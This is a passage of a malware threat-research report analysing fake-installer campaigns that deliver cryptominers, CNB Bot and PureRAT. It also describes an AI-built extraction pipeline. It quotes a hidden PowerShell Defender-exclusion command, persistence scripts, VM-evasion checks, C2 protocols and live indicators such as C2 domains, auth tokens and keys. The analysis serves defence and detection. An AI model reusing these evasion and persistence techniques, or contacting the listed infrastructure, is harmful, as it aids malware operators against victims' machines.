<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image15.png" alt="Decrypts, injects, and re-encrypts payload" title="Decrypts, injects, and re-encrypts payload" /></p>
<p>In the analyzed samples, SilentCryptoMiner utilizes two distinct processes for payload injection: the watchdog component is injected into <code>conhost.exe</code>, while the miner payload targets <code>explorer.exe</code>. The <code>WinRing0.sys</code> driver is also written to disk, then loaded and used by the miner. This is likely to optimize the CPU for mining operations.</p>
<h4>Watchdog and Miner Processes</h4>
<p>The watchdog is responsible for monitoring the loader file in its persistence folder: it rewrites the file to disk if it is deleted and reinstalls the persistence mechanism if the scheduled task or registry key is deleted.</p>
<p>The miner downloads its configuration from <code>(/UWP1)?/*CPU.txt</code> endpoints and communicates with its C2 via <code>[UWP1|UnamWebPanel7]/api/endpoint.php</code> API, depending on the version.</p>
<p>Based on the documentation and memory strings, we know that the miner includes supplementary protection measures: Like the .NET miner detailed previously, it halts mining operations when it detects specific blocklisted processes. These processes encompass a variety of tools, including those used for process monitoring, network monitoring, antivirus protection, and reverse engineering.</p>
<h2>Code analysis - CNB Bot</h2>
<p>CNB Bot is a .NET implant with integrated loader capabilities. It implements a command-polling loop against its configured C2 servers, and supports 3 operator commands:</p>
<ul>
<li>download-and-execute arbitrary payloads</li>
<li>self-update</li>
<li>uninstall/cleanup</li>
</ul>
<p>On Jan 31, 2026, malware researcher <a href="https://x.com/ViriBack/status/2017388775978967074">@ViriBack</a> discovered a related C2 panel that was exposed at <code>https://win64autoupdates[.]top/CNB/l0g1n234[.]php</code>, which has since been taken offline.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image16.png" alt="CNB Bot leaked panel" title="CNB Bot leaked panel" /></p>
<h3>Configuration</h3>
<p>Some configuration values for CNB Bot are not encrypted, such as the bot version (<code>1.1.6.</code>), campaign date (<code>03_26</code>), and the scheduled task name for persistence (<code>HostDataPlugin</code>).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image11.png" alt="Bot version and campaign ID in plaintext" title="Bot version and campaign ID in plaintext" /></p>
<p>Sensitive strings (C2 URLs, mutex name, auth token, comms key) are stored AES-256-CBC encrypted with a hardcoded 32-byte key, which differs across campaign batches.</p>
<p>Strings can be decrypted through the following formula:</p>
<pre><code>x = base64.decode(data)
decrypted = AES256CBC(key=hard_coded_key, iv=x[0:16]).decrypt(x[16:])
</code></pre>
<p>Extracted configuration:</p>
<table>
<thead>
<tr>
<th align="left">Field</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Mutex Name</td>
<td align="left"><code>MTXCNBV11000ERCXSWOLZNBVRGH</code></td>
</tr>
<tr>
<td align="left">C2 URL</td>
<td align="left"><code>https://tabbysbakescodes[.]ws/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">C2 URL fallback #1</td>
<td align="left"><code>https://tommysbakescodes[.]ws/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">C2 URL fallback #2</td>
<td align="left"><code>https://tommysbakescodes[.]cv/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">Auth Token</td>
<td align="left"><code>0326GJSECMHSHOEYHQMKDZ</code></td>
</tr>
<tr>
<td align="left">Comms AES Key (input)</td>
<td align="left"><code>AnCnDai@4zDsxP!a3E</code></td>
</tr>
<tr>
<td align="left">Scheduled Task</td>
<td align="left"><code>HostDataProcess</code></td>
</tr>
<tr>
<td align="left">Install Dir</td>
<td align="left"><code>%APPDATA%\HostData\</code></td>
</tr>
<tr>
<td align="left">Marker File</td>
<td align="left"><code>%APPDATA%\HostData\install.dat</code></td>
</tr>
<tr>
<td align="left">Executable</td>
<td align="left"><code>sysdata.exe</code></td>
</tr>
<tr>
<td align="left">Group / Campaign</td>
<td align="left"><code>03_26</code></td>
</tr>
<tr>
<td align="left">Bot Version</td>
<td align="left"><code>1.1.6.</code></td>
</tr>
</tbody>
</table>
<h3>Execution Flow</h3>
<p>At startup, CNB Bot uses five different methods to check for VM detection:</p>
<table>
<thead>
<tr>
<th align="left">Check</th>
<th align="left">Technique</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">WMI ComputerSystem</td>
<td align="left">Manufacturer/Model: &quot;vmware&quot;, &quot;virtualbox&quot;, &quot;vbox&quot;, &quot;qemu&quot;, &quot;xen&quot;, &quot;parallels&quot;, &quot;innotek&quot;, &quot;microsoft corporation&quot; (manufacturer) + &quot;virtual machine&quot; (model)</td>
</tr>
<tr>
<td align="left">WMI BIOS</td>
<td align="left">Version/Serial: &quot;vmware&quot;, &quot;virtualbox&quot;, &quot;vbox&quot;, &quot;qemu&quot;, &quot;bochs&quot;, &quot;seabios&quot;</td>
</tr>
<tr>
<td align="left">Process list</td>
<td align="left">&quot;vmtoolsd&quot;, &quot;vmwaretray&quot;, &quot;vmwareuser&quot;, &quot;vboxservice&quot;, &quot;vboxtray&quot;, &quot;xenservice&quot;</td>
</tr>
<tr>
<td align="left">Registry</td>
<td align="left">VMware Tools / VirtualBox Guest Additions keys: &quot;SOFTWARE\VMware, Inc.\VMware Tools&quot;, &quot;SOFTWARE\Oracle\VirtualBox Guest Additions&quot;, &quot;SYSTEM\CurrentControlSet\Services\VBoxGuest&quot;, &quot;SYSTEM\CurrentControlSet\Services\VBoxSF&quot;</td>
</tr>
<tr>
<td align="left">MAC Address</td>
<td align="left">&quot;00:0C:29&quot;, &quot;00:50:56&quot;, &quot;00:05:69&quot;, &quot;08:00:27&quot;, &quot;0A:00:27&quot;, &quot;00:16:3E&quot;, &quot;00:1C:14&quot;</td>
</tr>
</tbody>
</table>
<p>Each check returns zero or one and is summed against a threshold. When the detection threshold is reached, the first process instance acquires a named mutex and enters an infinite sleep <code>(Thread.Sleep(int.MaxValue))</code>, appearing hung rather than terminating cleanly. Any subsequent instance finding the mutex already held exits immediately.</p>
<p>Otherwise, on first execution, the implant checks for <code>%APPDATA%\HostData\install.dat</code>. If absent, it performs the initial installation:</p>
<ul>
<li>Generates a random 5-character alphabetic subdirectory name under <code>%APPDATA%\HostData\</code></li>
<li>Copies itself to <code>%APPDATA%\HostData\&lt;random&gt;\sysdata.exe</code></li>
<li>Writes the installed path to <code>install.dat</code></li>
<li>Extracts benign dependencies <code>DiagSvc.dll</code> and <code>sdrsvc.dll</code> into the same directory</li>
<li>Writes a VBScript wrapper <code>sysdata.vbs</code> alongside the binary: <code>CreateObject(&quot;WScript.Shell&quot;).Run &quot;&quot;&quot;&lt;installed_path&gt;&quot;&quot;&quot;, 0, False</code></li>
<li>Creates a scheduled task named <code>HostDataProcess</code> via schtasks.exe, configured to run <code>wscript.exe //nologo sysdata.vbs</code> every 10 minutes at <code>HIGHEST</code> privilege</li>
<li>Launches the installed copy as a hidden process with <code>%TEMP%</code> as the working directory</li>
<li>Self-deletes the original copy via a self-deleting BAT script (<code>timeout /t 3</code>, <code>loop-del</code>)</li>
</ul>
<p>On subsequent runs, when <code>install.dat</code> exists, and the running path matches its contents, the implant proceeds to active operation:</p>
<ul>
<li>Sets the current working directory to <code>%TEMP%</code></li>
<li>Repairs persistence: checks if <code>sysdata.vbs</code> exists (recreates if absent) and verifies the scheduled task is configured with <code>wscript.exe</code>, re-registering it if necessary</li>
<li>Acquires a named mutex (<code>MTXCNBV11000ERCXSWOLZNBVRGH</code>) - exits if already running</li>
<li>Instantiates the victim profiler, C2 comms, and command dispatcher</li>
<li>Issues a single POST to the C2 with <code>payload: &quot;fetch&quot;</code>, handles any returned task</li>
<li>Exits - next execution is driven entirely by the 10-minute scheduled task trigger</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image7.png" alt="CNB Bot main code logic" title="CNB Bot main code logic" /></p>
<h3>C2 Communication</h3>
<p>The malware communicates with its C2 by issuing HTTP POST requests with the Content-Type set to <code>application/x-www-form-urlencoded</code>. Each field value is independently AES-256-CBC encrypted with a random IV. The AES key is derived as the SHA-256 hash of the hardcoded communications passphrase (<code>AnCnDai@4zDsxP!a3E</code>). The IV is prepended to the ciphertext, and the entire blob is base64-encoded; C2 responses follow the same format.</p>
<pre><code>encrypted_field_value = base64_encode(random_iv + AES-256-CBC_encrypt\
 (key: SHA-256('AnCnDai@4zDsxP!a3E'), iv: random_iv, data: plaintext_field_value))
</code></pre>
<p>Fields sent on every request:</p>
<table>
<thead>
<tr>
<th align="left">Field</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>desktop</code></td>
<td align="left">machine name</td>
</tr>
<tr>
<td align="left"><code>username</code></td>
<td align="left">username</td>
</tr>
<tr>
<td align="left"><code>os</code></td>
<td align="left">Windows version</td>
</tr>
<tr>
<td align="left"><code>version</code></td>
<td align="left">bot version (<code>1.1.6.</code>)</td>
</tr>
<tr>
<td align="left"><code>privileges</code></td>
<td align="left">user OR admin</td>
</tr>
<tr>
<td align="left"><code>cpu</code></td>
<td align="left">processor name from the registry</td>
</tr>
<tr>
<td align="left"><code>gpu</code></td>
<td align="left">GPU name(s) from registry</td>
</tr>
<tr>
<td align="left"><code>gpu_type</code></td>
<td align="left">yes (discrete) / no (integrated)</td>
</tr>
<tr>
<td align="left"><code>group</code></td>
<td align="left">group / campaign ID (<code>03_26</code>)</td>
</tr>
<tr>
<td align="left"><code>client_path</code></td>
<td align="left">full path of running executable</td>
</tr>
<tr>
<td align="left"><code>local_ipv4</code></td>
<td align="left">external IP via <code>ipify[.]org</code> / <code>icanhazip[.]com</code> / <code>ident[.]me</code></td>
</tr>
<tr>
<td align="left"><code>auth_token</code></td>
<td align="left">authentication token (<code>0326GJSECMHSHOEYHQMKDZ</code>)</td>
</tr>
<tr>
<td align="left"><code>timestamp</code></td>
<td align="left">Unix epoch (UTC)</td>
</tr>
<tr>
<td align="left"><code>payload</code></td>
<td align="left">Command string (“fetch”, “completed”)</td>
</tr>
</tbody>
</table>
<p>A server response decrypts to either a task string, <code>“NO TASKS”</code>, or <code>“REGISTERED/UPDATED”</code>. When the client requests a task through <code>payload: “fetch”</code>, if a task exists for the client, the C2 response decrypts to a <code>&lt;sep&gt;</code>-delimited task string: <code>task_id&lt;sep&gt;command&lt;sep&gt;argument&lt;sep&gt;RSA_sig</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image32.png" alt="CNB Bot dispatcher function" title="CNB Bot dispatcher function" /></p>
<p>Prior to dispatch, each task undergoes RSA-SHA256 signature verification. The signed message is the concatenated string <code>task_id&lt;sep&gt;command&lt;sep&gt;argument</code>, and the signature is the base64-decoded <code>RSA_sig</code> field. A hardcoded RSA-2048 public key is used for verification.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image20.png" alt="RSA-SHA256 task verification" title="RSA-SHA256 task verification" /></p>
<p>Tasks failing verification are silently dropped. Without the operator's RSA private key, third parties cannot issue commands to infected hosts even with full C2 access.</p>
<h3>Supported Commands</h3>
<p>3 commands are supported, described in the table below:</p>
<table>
<thead>
<tr>
<th align="left">Command</th>
<th align="left">Behavior</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>download_execute</code></td>
<td align="left">Downloads URL argument to <code>%TEMP%\&lt;random&gt;.&lt;ext&gt;</code>. Execute: .exe (hidden), .bat/.cmd (cmd /c), .vbs (wscript.exe), other (ShellExecute).</td>
</tr>
<tr>
<td align="left"><code>update</code></td>
<td align="left">Downloads URL argument to staging location <code>%TEMP%\tmp_updt236974520367.exe</code>. Runs BAT to: kill current PID, overwrite installed binary with staged download, delete staging file, and self-delete BAT.</td>
</tr>
<tr>
<td align="left"><code>uninstall</code></td>
<td align="left">Deletes scheduled task, removes <code>install.dat</code>, self-deletes via BAT, rmdir install dir, and <code>%APPDATA%\HostData\</code>.</td>
</tr>
</tbody>
</table>
<h2>Earlier Campaigns</h2>
<p>Pivoting on the PureRAT mutex <code>Aesthetics135</code>, we discovered an earlier wave of the operation that presented a different fake installer UI.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image25.png" alt="Fake installer interface from early 2025" title="Fake installer interface from early 2025" /></p>
<h3>Early 2025 Build</h3>
<p>The sample <code>bb48a52bae2ee8b98ee1888b3e7d05539c85b24548dd4c6acc08fbe5f0d7631a</code> (first seen 2025-01-30) is a Themida and .NET Reactor-protected Windows Forms application that drops PureRAT v0.3.9.</p>
<p>It consists of 3 classes: <code>Fooo1rm</code> (the ApplicationContext entry point), <code>Form2</code> (the installer UI and the PureRAT dropper), and <code>Form3</code> (a fake registration lure). The code structure closely resembles the more recent campaigns.</p>
<p>On initialization, it immediately invokes a hidden PowerShell one-liner to add itself to Microsoft Defender exclusions before any UI appears: <code>powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionPath '&lt;self_path&gt;'; Add-MpPreference -ExclusionProcess '&lt;self_path&gt;'</code>. A timer with a 2,846 ms interval fires, instantiating and showing Form2.</p>
<p><code>Form2</code> presents a progress bar dialog titled “Getting things ready” with a 12-step timer ticking every 1,000 ms, simulating a legitimate installation.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image18.png" alt="Fake loading bar" title="Fake loading bar" /></p>
<p>A second PowerShell exclusion command covers <code>%LocalAppData%</code>, <code>%AppData%</code>, the drop directory <code>%LocalAppData%\winbuf</code>, and process names including <code>winbuf.exe</code>, <code>wintrs.exe</code>, and <code>AddlnProcess.exe</code>. The PureRAT v0.3.9 payload is extracted from the assembly manifest resource and written to <code>%LocalAppData%\winbuf\winbuf.exe</code>. Persistence is established via <code>schtasks.exe</code>.</p>
<p>Extracted PureRAT config:</p>
<ul>
<li><code>wndlogon.hopto.org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb.com</code> (C2 #2)</li>
<li><code>wndlogon.kozow.com</code> (C2 #3)</li>
<li><code>wndlogon.ydns.eu</code> (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
<li><code>29-01-25</code> (build / campaign date)</li>
</ul>
<p><code>Form3</code> serves purely as a social engineering mechanism to drive <a href="https://en.wikipedia.org/wiki/Cost_per_action">Cost Per Action</a> (CPA) offer completions through a content locker.</p>
<blockquote>
<p>Content lockers are a monetization technique in which access to a resource is gated behind completing CPA (Cost Per Action) offers, such as filling out a survey or signing up for a service. The malware operator earns a commission each time a victim completes one of these offers.</p>
</blockquote>
<p>It presents a fake “Registration Required” dialog with a key entry field, a “Validate” button, and a hyperlink labeled “here” that opens <code>https://tinyurl[.]com/cmvt944y</code>. Key validation is entirely fake. Regardless of input, the handler introduces a hardcoded 2-second delay, then always returns “Invalid key. Please try again.”</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image2.png" alt="Fake registration key input invalidation" title="Fake registration key input invalidation" /></p>
<p>The TinyURL shortlink <code>tinyurl[.]com/cmvt944y</code> redirects to the lure page at <code>rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/</code>.</p>
<p>The page used to host a minimal HTML document titled &quot;Registration Key is Ready&quot;, designed to trick the victim into interacting with the CPA content locker. It presents a download icon and a fake file link labeled <code>Registration_Key.txt</code>, alongside a unique campaign tracking ID (<code>z872d515ea17b4e6c3abca9752c706242</code>) displayed in the page body.</p>
<p>The content locker JavaScript (<code>3193171.js</code>) is loaded from <code>d3nxbjuv18k2dn.cloudfront[.]net</code>, and clicking the <code>Registration_Key.txt</code> link triggers the offer wall under the pretext of unlocking a license key.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image31.png" alt="Content at rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/" title="Content at rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/" /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image23.png" alt="CPA content locker JS (3193171.js)" title="CPA content locker JS (3193171.js)" /></p>
<h3>Late 2023 Build</h3>
<p>An older sample - <code>6a01cc61f367d3bae34439f94ff3599fcccb66d05a8e000760626abb9886beac</code> (first seen 2023-11-09) presented a similar fake installer UI. This represents the earliest activity we attributed to this threat actor based on shared infrastructure and tooling.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image29.png" alt="Fake installer interface from late 2023" title="Fake installer interface from late 2023" /></p>
<p>This campaign build dropped PureRAT v0.3.8B, in which the in-memory PE loader component used a SmartAssembly-protected PureCrypter.</p>
<p>Extracted PureRAT config:</p>
<ul>
<li><code>wndlogon.hopto.org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb.com</code> (C2 #2)</li>
<li><code>wndlogon.kozow.com</code> (C2 #3)</li>
<li><code>wndlogon.ydns.eu</code> (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
<li><code>09.11.23</code> (build / campaign date)</li>
</ul>
<p>On the installation window, the “go here” hyperlink opens a short link <code>https://t[.]ly/MQXPm</code> that redirects to the lure page <code>https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/</code>, which presents 2 outgoing fake download links:</p>
<ul>
<li><code>https://rapidfilesbaze[.]top/z78fGbs2b7XceWop21aQsrx41Rkeydsktp/</code></li>
<li><code>https://rapidfilesbaze[.]top/z78fGbs2b7XceWop21aQsrx41Rkeymbl/</code></li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image27.png" alt="Content at https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/" title="Content at https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/" /></p>
<p>Both links were offline at the time of analysis. However, historical data indicates that <code>rapidfilesbaze[.]top</code> has been used consistently for CPA-style offer lures.</p>
<p>A <a href="http://URLScan.io">URLScan.io</a> archived response for a related path (<code>rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/</code>) confirms the site's use as a lure landing page.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image12.png" alt="Content at rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/" title="Content at rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/" /></p>
<p>The downstream unlocker site at <code>https://unlockcontent[.]net/cl/i/me9mn2</code> remains active as of this writing.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image37.png" alt="Content at https://unlockcontent[.]net/cl/i/me9mn2" title="Content at https://unlockcontent[.]net/cl/i/me9mn2" /></p>
<h2>GitHub Profiles</h2>
<p>Beyond the C2 infrastructure, the threat actor abuses GitHub as a payload delivery CDN, hosting staged binaries across two identified accounts. This technique shifts the download-and-execute step away from operator-controlled infrastructure to a trusted platform, reducing detection friction. Both profiles were confirmed through decrypting C2 task traffic captured by VirusTotal sandboxes, which issued download-and-execute tasks pointing directly to raw GitHub content URLs. The operator routinely deletes individual binaries and entire repositories; the files documented below were captured via VirusTotal submissions or direct retrieval from GitHub prior to deletion.</p>
<p>The first profile, <code>https://github[.]com/lebnabar198</code>, surfaced during analysis of Campaign 2. After decrypting the C2 traffic from the <code>windirautoupdates[.]top</code> server, we observed the PureRAT implant being instructed to fetch a payload from this account, specifically the custom XMRig loader <code>MnrsInstllr_240126.exe</code>. This establishes a direct operational link between the PureRAT C2 and this GitHub profile.</p>
<p>The second profile, <code>https://github[.]com/ugurlutaha6116</code>, was identified by decrypting traffic from a PureRAT loader (SHA-256: <code>e1e87d11079d33ec1a1c25629cbb747e56fe17071bde5fd8c982461b5baa80a4</code>), which used the same PBKDF2 key derivation structure with the comms key <code>Aesthetics152</code>. The decrypted task pointed to the hosted payload <code>PM3107.exe</code>.</p>
<p>The hosted files map to the following payloads:</p>
<table>
<thead>
<tr>
<th align="left">Filename</th>
<th align="left">Associated payload</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>CNB-v112-zUpdt-inPmnr.exe</code></td>
<td align="left">CNB Bot</td>
</tr>
<tr>
<td align="left"><code>MyXMRmnr_Instllr_0302.exe</code></td>
<td align="left">Custom XMRig loader</td>
</tr>
<tr>
<td align="left"><code>MnrsInstllr_240126.exe</code>, <code>MnrsInstllr_030126.exe</code></td>
<td align="left">Custom XMRig loader</td>
</tr>
<tr>
<td align="left"><code>PM2311.exe, PM1109.exe</code>, …</td>
<td align="left">PureMiner</td>
</tr>
<tr>
<td align="left"><code>Pmnr_1303_wALL.exe</code>, <code>Pmnr_Instllr_1303.exe</code>, …</td>
<td align="left">PureMiner</td>
</tr>
<tr>
<td align="left"><code>A_Instllr_250525.exe</code></td>
<td align="left">AsyncRAT</td>
</tr>
<tr>
<td align="left"><code>U_n_P_Installer_220725.exe</code>, <code>U_n_P_Installer_110725.exe</code>, …</td>
<td align="left">Loader for SilentCryptoMiner &amp; PureMiner</td>
</tr>
<tr>
<td align="left"><code>umnr_120525.exe</code>, <code>Umnr_1403_frPmnr.exe</code>, …</td>
<td align="left">SilentCryptoMiner</td>
</tr>
<tr>
<td align="left"><code>plsr_instllr_1804.exe</code></td>
<td align="left">Pulsar RAT</td>
</tr>
</tbody>
</table>
<h2>Monero Wallet Analysis</h2>
<p>During our analysis of the cryptominer payloads, we successfully extracted four active Monero (XMR) wallet addresses from the malware's configuration. Because the threat actor is routing their compromised hosts through public mining pools, we can query the pool's public dashboards using these wallet addresses. It provides information about the operational scale and profitability of the campaigns.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image30.png" alt="Tracking mining activity through a public dashboard" title="Tracking mining activity through a public dashboard" /></p>
<p>Based on the telemetry available at the time of writing, here is the current status of the attacker's mining operations:</p>
<ul>
<li><strong>Wallet 1:</strong> <code>87NnUp8GKVBZ8pFV75Gas4A5nMMH7gEeo8AXBhm9Q6vS5oQ6SzCYf1bJr7Lib35VN2UX271PAXeqRFDmjo5SXm3zFDfDSWD</code>
<ul>
<li><strong>Active Workers:</strong> 7</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0172 XMR / day</li>
<li><strong>Total Paid Out:</strong> 2.2 XMR</li>
</ul>
</li>
<li><strong>Wallet 2:</strong> <code>89FYoLrfXwEDAVAsVYbhAfg3mATUtBzNAK2LG8wwDKfNTRhmNRTBn1VbwpFxEpJ8h5fQa2A4CS1tpRv7amUdJ3ZbUoVu6T1</code>
<ul>
<li><strong>Active Workers:</strong> 3</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.02 XMR / day</li>
<li><strong>Total Paid Out:</strong> 4.23 XMR</li>
</ul>
</li>
<li><strong>Wallet 3:</strong> <code>89WoZKYoHhcNEFRV8jjB6nDqzjiBtQqyp4agGfyHwED1XyVAoknfVsvY1CwEHG6nwZFJGFTF5XbqC4tAQbnoFFCX8UQof3G</code>
<ul>
<li><strong>Active Workers:</strong> 2</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0057 XMR / day</li>
<li><strong>Total Paid Out:</strong> 11.69 XMR</li>
</ul>
</li>
<li><strong>Wallet 4:</strong><br />
<code>83Q1PKZ5yXsP8SCqjV3aV7B3UoBB3skPp49G1VnnGtv5Y5EUbFQTXvzR9cZshBYBBfd8Dm1snkkud431pdzEZ2uJTad1CiC</code>
<ul>
<li><strong>Active Workers:</strong> 2</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0036 XMR / day</li>
<li><strong>Total Paid Out:</strong> 9.76 XMR</li>
</ul>
</li>
</ul>
<p>With a combined total of over 27.88 XMR (~ USD$ 9392) already successfully paid out to the attacker, it proves that low-and-slow cryptojacking operations can yield consistent financial returns over time.</p>
<h2>Agentic Payload and Configuration Extraction Pipeline</h2>
<p>In this research, we examined several hundred infection chains across the campaigns we described. For each chain, we have samples, mainly .NET, which are either loaders or final payloads layered with .NET Reactor obfuscation and often Themida packing.</p>
<p>The large number of these chains makes manual configuration and unpacking time-consuming and difficult to scale across all the chains we discovered. This is why, as part of this research, we used the Claude Opus 4.5 model to quickly vibecode a payload and configuration extraction pipeline. In this section, we provide details on the choices we made and the results we obtained with this method.</p>
<h4>Triage</h4>
<p>To optimize processing time, this phase focuses on extensively exploring infection chains using VirusTotal. We begin by obtaining a list of hashes from VirusTotal based on a specific pivot. For instance, using the README.txt content as a pivot to identify other ISOs.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image39.png" alt="VirusTotal ISO pivot" title="VirusTotal ISO pivot" /></p>
<p>Claude is instructed to use a Python script to perform a recursive download. This process involves gathering information about embedded binaries and dropped files associated with each file hash. Claude then uses its “intelligence” to identify the most subsequent link in the chain and continues its investigation until it reaches what it considers the final binary in that chain. After exploring all chains, Claude analyzes the patterns and creates chain types to group them. Finally, the results are compiled into a CSV file for subsequent analysis.</p>
<p>The data we obtained includes the starting hash from VirusTotal and the final hash, representing the last file Claude successfully tracked. This demonstrates that, with the right guidance, Claude can effectively track entire chains using only information from VirusTotal.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image6.png" alt="Triaged data" title="Triaged data" /></p>
<h4>Download and Extraction</h4>
<p>Once the triage file was created, we downloaded the intermediate payloads and instructed Claude to start the automatic payload/configuration extraction process. To do this, we installed an OpenSSH server on a Windows virtual machine, then created a Claude skill containing instructions to connect to this machine and use the installed tools to perform the reverse engineering and extraction workflow.</p>
<p>The workflow is simple: Claude connects to the machine, uploads the sample, detects whether it is obfuscated or packed with Detect It Easy, and applies the appropriate deobfuscation tool until the sample is no longer obfuscated (Unlicense, .NET Reactor Slayer). It then runs the developed extraction scripts to identify what the sample is and determine the next step: either continue extraction with the child payload if the parent is a loader, or store the configuration information for the final report.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image19.png" alt="Payload/Configuration extraction Claude skill" title="Payload/Configuration extraction Claude skill" /></p>
<p>If all the extraction scripts fail, Claude must enter Research Mode. This mode is the most enjoyable part of the skill because it gives Claude a workflow to either automatically develop a new extraction script or identify why the existing script doesn't work with the variant. Claude’s Research Mode consists of using the <a href="https://github.com/dnSpyEx">dnSpyEx</a> tool installed on the machine to compile the sample's C# code, perform a complete code analysis, identify how to extract the payload or configuration, then develop a script with this knowledge to work directly with the raw binaries to be more efficient and finally store the knowledge for the next time it has to work on the same malware family.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image28.png" alt="Research mode instruction" title="Research mode instruction" /></p>
<h4>Results</h4>
<p>Using the Claude Opus 4.5 model, the results were really good. Not only did Claude succeed in handling the obfuscation layers, but it also completely researched and developed, on its own, the methods and scripts (based on the CIL of .NET binaries) to extract the final payloads and their configurations without having encountered them before.</p>
<p>It also demonstrated robust failure handling without requiring additional instruction. For example, when it encountered samples that could not be fully deobfuscated due to issues with Reactor Slayer, which made static extraction too difficult, it stopped processing, documented the problem, and proceeded to the next sample.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image9.png" alt="Claude entering Research Mode on extraction failure" title="Claude entering Research Mode on extraction failure" /></p>
<p>Of course, it is not without drawbacks:</p>
<ul>
<li>Once its context started to fill up too much, it often diverged onto useless paths and required either micro-management or a reset, hence the usefulness of having a skill with reusable instructions and a knowledge base on the work already done.</li>
<li>It takes a long time, every action requires it to “think”, however, it’s automatic and it's definitely time recovered you can use to do something else.</li>
<li>Its token consumption is particularly greedy, especially once you figure out it’s doing a lot of inefficient things.</li>
</ul>
<h2>Observations</h2>
<p>The following tables consolidate malware configurations extracted across the builds we investigated, and are not exhaustive:</p>
<p><strong>CNB Bot</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>1.1.1.</code>, <code>1.1.2.</code>, <code>1.1.3.</code>, <code>1.1.5.</code>, <code>1.1.6.</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s:</td>
<td align="left"><code>tabbysbakescodes[.]ws/CNB/gate.php</code>&lt;br /&gt;<code>tommysbakescodes[.]ws/CNB/gate.php</code>&lt;br /&gt;<code>tommysbakescodes[.]cv/CNB/gate.php</code>&lt;br /&gt;<code>win64autoupdates[.]top/CNB/gate.php</code>&lt;br /&gt;<code>autoupdatewinsystem[.]top/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">Campaign/Build ID</td>
<td align="left"><code>03_26</code>, <code>25_02_26</code>, <code>15_02_26</code>, <code>1502_26</code>, <code>0502_26</code>, <code>01-26</code>, <code>frPmnr_0126</code></td>
</tr>
<tr>
<td align="left">Auth tokens</td>
<td align="left"><code>0326GJSECMHSHOEYHQMKDZ</code> <code>020226SNDLPXSHTCSURVQ</code> <code>0226frBLKWNYHD0FS1YWE</code> <code>0126HRAOLQEFNGGRCXMITREQC</code></td>
</tr>
<tr>
<td align="left">Mutex</td>
<td align="left"><code>MTXCNBV11000ERCXSWOLZNBVRGH</code></td>
</tr>
</tbody>
</table>
<p><strong>PureRAT</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>0.3.8B</code>. <code>0.3.9</code>, <code>0.4.1</code>, <code>3.0.1</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>windirautoupdates[.]top</code>&lt;br /&gt;<code>winautordr.hopto[.]org</code>&lt;br /&gt;<code>winautordr.itemdb[.]com</code>&lt;br /&gt;<code>winautordr.ydns[.]eu</code>&lt;br /&gt;<code>winautordr.kozow[.]com</code>&lt;br /&gt;<code>wndlogon.hopto[.]org</code>&lt;br /&gt;<code>wndlogon.itemdb[.]com</code>&lt;br /&gt;<code>wndlogon.kozow[.]com</code>&lt;br /&gt;<code>wndlogon.ydns[.]eu</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
